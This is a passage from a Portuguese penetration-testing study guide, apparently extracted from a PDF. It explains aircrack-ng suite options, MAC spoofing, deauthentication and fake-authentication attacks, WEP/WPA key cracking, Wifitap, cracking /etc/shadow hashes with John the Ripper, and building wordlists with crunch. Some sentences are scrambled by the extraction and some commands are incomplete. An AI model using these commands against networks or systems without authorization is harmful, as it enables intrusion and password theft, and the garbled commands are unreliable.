--output-format = Formato de saída - pcap, ivs, csv, gps, kismet, netxml fixed channel : -1 = Canal fixo Filter options: = Opções de filtros


4 54


--encrypt : Filter APs by cipher suite = Filtra APs pela criptografia

--netmask : Filter APs by mask = Filtra APs pela máscara de sub-rede

--bssid : Filter APs by BSSID = Filtra APs pelo BSSID

-a : Filter unassociated clients = A mesma coisa que -cswitch

You can make it capture on other/specific channel(s) by using: Captura em canais específicos de acordo com sua vontade --channel : Capture on specific channels = Capture em um canal específico

--band : Band on which airodump-ng should hop = Banda na qual o airodump-ng deve saltar (a, b ou g)

-C : Uses these frequencies in MHz to hop = Usar frequência em MHZ para salto.

--cswitch : Set channel switching method = Configura o método de alternanção entre os canais.


4 55


0 : FIFO (default) = FIFO (padrão 1 : Round Robin = Sem tradução amigável 2 : Hop on last = Salta no ultimo. -s : same as --cswitch = O mesmo que --cswitch --help : Displays this usage screen = Mostrar na tela as opções disponíveis para utilização do programa.

Aireplay-ng – Serve para Injetar pacotes falsificados em uma rede sem fio, permite falsificar autenticações e desassociar os usuários legítimos da rede.


4 56


Modo filtro -b bssid -> Especifica o MAC do Access Point -d dmac -> Especifica o MAC de destino -s smac -> Especifica o MAC de srcem

Modo replay: -a bssid -> Especifica o MAC do Access Point -c dmac -> Especifica o MAC de destino


4 57


-h smac -> Especifica o MAC de srcem -x num -> Número de pacotes por segundo

Modo ataque: --deauth num -> Desassocia 1 ou todas (0) as estações (opção 0) --fakeauth atraso -> Finge autenticação com o AP (opção 1) --arpreplay -> Injeta pacotes ARP na rede wi-fi (opção 3) --caffe-latte -> Pede a um cliente mais IVs (opção 6)

Opções do ataque Fakeauth: -e essid -> Especifica o ESSID do Access Point -o num -> Número de pacote por burst (0=auto, padrão=1) -q seg -> Segundos entre keep-alives -Q -> Enviar pedidos de reassociação -y prga -> Chave para autenticação (capturada via airodump-ng) -T num -> Interrompe após n tentativas de autenticação


4 58


Airbase-ng – Permite criar Access Point simulado para a realização de ataques de captura de chaves e Técnicas de Homem no meio "MITM" contra os dispositivos clientes.

Opções: -a bssid -> Especifica o MAC do Access Point -a essid -> Especifica o ESSID do Access Point (nome da rede) -i interface -> Interface que terá seus pacotes capturados -w

chave_wep

->

use

essa

chave

wep

para

criptografar/descriptografar pacotes


4 59


-h MAC -> Usado em ataques de MITM (MAC de srcem) -W 0|1 -> Habilita (1) ou Desabilita (0) uso do WEP -z tipo -> Configura WPA1 . 1=WEP40, 2=TKIP, 3=WRAP, 4=CCMP, 5=WEP104 -Z tipo -> Configura WPA2. Mesmas opções do WPA1. -C segundos -> Habilita beaconing dos ESSIDs detectados com a opção –P -v -> Modo verbose (mostra mais informações) -c -> Configura o canal que o AP está funcionando -X -> Coloca o AP com seu ESSID oculto -P -> Responde a todas as requisições -L -> Habilita o ataque Caffe Latte do WEP

Aircrack-ng – Serve para quebrar a chave de criptografia WEP ou WPA capturada através do airodump-ng ou de outra ferramenta de captura.


4 60


Airdecap-ng – Os pacotes passam na rede wireless criptografados e somente quem tem a chave pode decodificar e extrair tais pacotes, essa ferramenta permite decodificar pacotes criptografados fornecendo o arquivo de captura de pacotes e a chave de criptografia.


4 61


Passos para um ataque a uma rede wireless Os passos para um ataque a uma ou várias redes wireless são os seguintes: Lembrando que você pode fazer tudo isso na mão ou através das ferramentas, demonstrarei as duas opções aqui para que você entenda melhor e possa tomar suas próprias decisões de acordo com suas necessidades. 1 - Trocar o endereço MAC; Principalmente se não desejar ter seu endereço mac srcinal.


4 62


2 - Ativar o monitor de sua placa de rede wireless; A ativação do modo de monitoramento da placa de rede pode ser feito com o airmon-ng ou através da linha de comandos no Linux

3 - Ativar a coleta de dados e motivar o envio de IV a partir do AP .

Após coletar um bom número de IV´s é só realizar força bruta para identificar a chave WEP ou Dicionário para chave WPA.

Clonando o endereço MAC


4 63


Em muitas tarefas de analise de vulnerabilidades será necessários a clonagem do mac address de sua placa de redes.

#ifconfig eth0 down #airmon-ng stop eth0 #macchanger --m FA:SI:FU:00:00:00


4 64


Com o comando acima você pode derrubar a placa de rede e clonar o endereço MAC. O próximo passo será levantar a placa e os serviços.

Aqui vemos que a placa clonada já esta funcionando corretamente. Agora é só utilizar o programa de sua preferência para capturar os pacotes ou mesmo utilizar a rede com o endereço MAC clonado. Lembramos que há fortes implicações legais se você utilizar qualquer destas técnicas para algo ilícito, como se passar por outra pessoa etc. Se utilizar essas técnicas dentro da empresa sem as devidas autorizações por escrito você pode inclusive ser demitido por justa causa.


4 65


Conhecendo melhor e praticando com o macchanger O macchanger é um utilitário Linux para visualizar e manipular o endereço MAC dos dispositivos de redes - Você encontra o manual completo dele, se digitar em uma shell linux o comando #man

macchanger SYNOPSIS = Resumo 

macchanger [options] device = macchanger [ opções]

dispositivo de redes a ser clonado macchanger -h, --help = Ajuda macchanger -V, --version = Versão macchanger outras opções através do seu manual

Organizando um ataque em inf raestrutura wireless 1-) Parar as interfaces de rede wireless: #ifconfig down #airmon-ng stop


4 66


2-) Falsificar um MAC ADDRESS #macchanger --m FA:SI:FU:00:00:00 airmon-ng airmon-ng start wlan0 Airmon-ng check wlan0 iwconfig mode monitor (ou airmon-ng start wlan0) Iwconfig - Verificar as configurações Ifconfig -a - Idem airodump-ng --ivs -w arquivo.ivs


4 67


Praticando com o airodump Com já citado anteriormente o Airodump-ng é usado para capturar pacotes de frames brutos 802.11 e é muito eficiente na coleta de IVs "Vetores de Inicialização" WEP . Após a captura de uma boa quantidade de IVS já pode-se descobrir senhas com a utilização do aircrack-ng. Adicionalmente o airodump-ng pode criar um arquivo de texto (também chamado de “dump”) contendo os detalhes d e todos os

Access Points e clientes encontrados.


4 68


Quebrar a senha com o aircrack Após a captura dos pacotes, deve-se utilizar o aircrack para descifrar a senha da redes wireless, não importante de é wep ou wpa pois esse procedimento é relativamente simples, vamos conhecer um pouco mais sobre o aircrack e aprender a utilizá-lo para testar a fragilidade de sua rede sem fio. Na prática basta utilizar o comando abaixo para iniciar essa maravilhosa ferramenta de quebra de senhas. Advirto que as informações completas você pode obter através do site oficial em: http://www.aircrack-ng.org #aircrack-ng -w dicionario.txt - para utilizar

dicionário.


4 69


Aqui devem ser mostradas todas as redes encontradas.


4 70


Senha decifrada

No primeiro exemplo foi testado um arquivo contendo senha wpa, nos casos de senha wep pode ser utilizado força bruta com o comando abaixo.

aircrack-ng para força bruta.


4 71


Algumas opções de uso do aircrack Lembramos que o manual completo você pode ler no site oficial do aircrack em: http://www.aircrack-ng.org/

usage: = Uso aircrack-ng [options] <.cap / .ivs file(s)> -a : force attack mode (1/WEP, 2/WPA-PSK) = Modo do ataque -e : target selection: network identifier = Seleção de alvo e identificação da rede -b : target selection: access point's MAC = Seleção do alvo e mac address do access point -p : # as of CPU´s CPU to use (default: all CPUs) = Uso de CPU´s o padrão é todas -q : enable quiet mode (no status output) = Ativar o modo silencioso -C : merge the given APs to a virtual one = Mesclar AP´s


4 72


-c : search alpha-numeric characters only = Buscar somentes caracteres alfa-numéricos -t : search binary coded decimal chr only = Buscar somente código binário e decimal -h : search the numeric key for Fritz!BOX = Procurar a chave numérica -d : use masking of the key (A1:XX:CF:YY) = Usar a chave de mascaramento -m : MAC address to filter usable packets = Habilitar endereço mac para filtrar pacotes -n : WEP key length : 64/128/152/256/512 = Compimento da chave wep -i : WEP key index (1 to 4), default: any = Indice de chave web de 1 a 4, o padrão é qualquer um -f : bruteforce fudge factor, default: 2 = Fator de correção "força bruta" o padrão é 2 -k : disable one attack method (1 to 17) = Desativa o metodo de ataque, o pdrão é de 1 a 17 -x or -x0 : disable bruteforce for last keybytes = Desabilita forrça bruta para os ultimos keybytes

cracking options: = Opções para craquear -w : path to wordlist(s) filename(s) WPA-PSK = Caminho para o arquivo contendo a wordlist Exemplo: aircrack nome do aqrivo contendo a possivel senha -w caminho do dicionário

options: Opções -E : create EWSA Project file v3 = criar arquivo -J : create Hashcat Capture file = criar um hash do arquivo -S : WPA cracking speed test = Teste de velocidade


4 73


-r : path to airolib-ng database (Cannot be used with -w) = Caminho para o banco de dados (Não utilizar com -w) Para as outras opções acessem o site do projeto em: http://www.aircrack-ng.org/

Wifitap

#./wifiping.py eth0 O Wifitap é uma ferramenta para prova de conceito em redes WiFi usando injeção de tráfego. O Wifitap permite a comunicação direta com uma estação associada a um dado ponto de acesso diretamente, isso access significa que você não precisa estar associado e não será tratado pelo point. ~# modprobe +modulo de sua placa ~# ifconfig eth1 up (considerando que eth1 é sua placa de rede) ~# iwlist eth1 scan


4 74


eth1

Scan completed :

Para montar a interface WiFi em modo monitor no canal 11. Por exemplo: ~# iwconfig eth1 mode monitor channel 11 ~# ifconfig eth1 promisc

~# wifitap.py Ele tem um manual que você acessar com o comando cat README

O Wifitap permite que você capture qualquer aplicativo que envie e recebe pacotes IP utilizando 802,11.


4 75


Além disso, lhe permite livrar-se de qualquer limitação definida no ponto de acesso, pois traz consigo algumas ferramentas adicionais que podem auxiliá-lo em suas tarefas.

  

Requisição ARP (wifiarp.py); Requisição DNS (wifidns.py). Requisição de acho ICMP (wifiping.py);


4 76


Auditando senhas com o John The Ripper

As senhas são consideradas como o ponto mais fraco de qualquer sistemaoucomputacional, pois geralmente são definidas sem muito mesmo nenhum conhecimento dessa matéria,por porusuários desconhecer o que significa uma senha forte ou fraca e mesmo dos potenciais riscos de se utilizar informações pessoais na escolha da senha, tornando seus sistemas totalmente vulneráveis. Fazer com que estas senhas sejam trocadas em intervalos de tempo curtos e usando senhas fortes pode minimizar em muito esse risco. Quebrar senhas com força bruta e ou mesmo dicionários é o papel de ferramentas como o Hydra e John The Ripper. Quando um atacante tem acesso diretamente ao arquivo que contém as senhas (como o arquivo shadow do Linux ou sam do Windows por exemplo, ele poderá utilizar um software que consiga descobrir a senha e é isso que iremos demonstrar agora com John The Ripper.


4 77


Dentro do diretório encontraremos diversos arquivos e outros diretórios, inclusive wordlist com milhares de opções de senhas para testes, mais o ideal é sempre ter sua própria wordlit

Uma da primeiras tarefas é testar a capacidade seu hardware em trabalhar com criptografia, o que deve ser feito com o comando abaixo.


4 78


Ao digitar #./john -test e pressionar enter a capacidade do hardware de lidar com criptografia será testada. Um relatório será apresentado, cabe a você escolher para onde deve ser enviado ou se deseja manter apenas na saída padrão para visualização imediata. Vamos testar a capacidade do john em nosso arquivo de senhas do usuários do Linux; #copia cp /etc/shadow = Esse comando irápara fazero uma com hashes/home/arquivos de senhas de meu arquivo shadow diretório home e dará o nome de minhassenhas.txt; # ./john /home/caminho_do_arquivo = O comando abaixo irá descubrir as senhas dentro do arquivo especificado;

Podemos pegar a senha de um usuário especifico se desejar, para isso basta especificar corretamente conforme o exemplo abaixo. #./john -show -users:adonel /etc/shadow = Para exibir a senha do adonel


4 79


#./john -show -users:root /etc/shadow = Para exibir a senha do root

Vimos até aqui que o john é extraordinário para quebrar senhas.

Criando wordlist Existem situações em que não dar para fazer força bruta direto, como é oPara casoesses das senhas criptografadas comum WPA redes Wireless. casos você terá que criar bomnas dicionário (as chamadas wordlists) que podem auxiliar bastante nesse processo. Uma ferramenta muito boa e que já esta disponível no Backtrack é crunch disponível em: http://wordlist.sourceforge.net

#./crunch 6 12 1234567890 -o /tmp/wordlist-numerica.txt Com o comando acima criaremos uma wordlist com senha numérica, com o mínimo de 6, Maximo de 12 caracteres. já com o comando abaixo podemos criar uma wordlist com outras combinações, inclusive fixando parte da senha.


4 80


No exemplo abaixo irei criar uma wordlist com 10 caracteres, acrescendo o nome jose em todas as tentativas ou seja, a opção -t nos permite repetir em todas as opções a palavra jose. Nas opções pode-se também acrescentar o alfabeto em letras MAISCULAS OU minúsculas e números, depende de suas necessidades.

# ./crunch 10 10 1234567890 -t jose@@@@ -o /tmp/wordlistjose.txt = Wordlist com string fixa.

Bibliográfica Foram pesquisadas varias fontes como pesquisa para embasar esse volume, mais o maior destaque foi exatamente o objeto do projeto em http://www.backtrack-linux.org TCP/IP A Bíblia: Meeta Gupta, Mridula Parihar, Paul Lasalle, Rob Scrimger Redes De Computadores: Andrew S. Tanenbaum Exame de Redes com Nmap: http://www.lcm.com.br Pilha TCP/IP: http://www.rfc-editor.org Metasploit: http://www.metasploit.com


4 81


Sniffer de redes na internet: http://www.serversniff.net/index.php Base de dados de exploits: http://www.exploit-db.com Clube do Hacker: http://www.clubedohacker.com.br Fontes do Debian em: debian.org Fonte: clubedohacker.com.br Wireshark: www.wireshark.org www.untidy.sourceforge.net http://www.fastandeasyhacking.com http://www.ieee802.org/11 http://www.ieee.org http://dradisframework.org BEZERRA, Adonel - Evitando Hackers http://datatracker.ietf.org/wg/sigtran/charter http://www.ietf.org/rfc/rfc3309.txt http://www.ietf.org/rfc/rfc4460.txt https://github.com/beefproject/beef https://sourceforge.net/projects/blindelephant http://www.aircrack-ng.org http://technet.microsoft.com/pt-br/library/cc716451.aspx http://www.owasp.com/index.php/Main_Page, OSSTMM em: http://www.isecom.org/research/osstmm.html Assunção, Marcos Flávio Araújo – Segredos do Hacker Ético. 4.ed, Visual books 2011.


4 82


Aqui eu dou por concluso esse módulo, enquanto você pesquisa sobre as sugestões apresentadas nessa estapa eu começo o segundo módulo avançado que irá apresentar as outras ferramentas do Kali Linux e discutiremos as formas de apresentação do relatório final para o cliente. Peço as bençãos de Deus para todos nós nessa caminhada. Desejo muito sucesso em sua vida profissonal como analista de vulnerabilidades. Adonel Bezerra. www.clubedohacker.com.br


4 83

guia_de_estudos_para_analise_de_vulnerabilidades.pdf

Recommend Documents